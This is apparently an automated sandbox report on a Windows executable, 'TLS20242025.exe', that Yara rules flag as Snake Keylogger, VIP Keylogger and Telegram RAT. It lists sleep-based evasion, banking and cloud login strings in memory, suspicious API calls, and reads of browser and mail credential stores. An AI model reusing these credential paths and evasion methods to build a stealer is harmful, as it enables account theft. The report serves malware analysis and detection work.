Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596920	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596803	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 594575	Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe	Window / User API: threadDelayed 1657			Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Window / User API: threadDelayed 8201			Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4948	Thread sleep count: 1657 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4948	Thread sleep count: 8201 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596920s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596803s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -594905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe TID: 4876	Thread sleep time: -594575s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596920	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596803	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Thread delayed: delay time: 594575	Jump to behavior

Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: TLS20242025.exe, 00000002.00000002.4583576880.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls>Q
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003DCF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\TLS20242025.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe

Code function: 2_2_067D9548 LdrInitializeThunk,

2_2_067D9548

Source: C:\Users\user\Desktop\TLS20242025.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.TLS20242025.exe.5200000.6.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.TLS20242025.exe.5200000.6.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.TLS20242025.exe.5200000.6.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Source: C:\Users\user\Desktop\TLS20242025.exe

Process created: C:\Users\user\Desktop\TLS20242025.exe "C:\Users\user\Desktop\TLS20242025.exe"

Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Users\user\Desktop\TLS20242025.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Users\user\Desktop\TLS20242025.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\TLS20242025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\TLS20242025.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\TLS20242025.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE
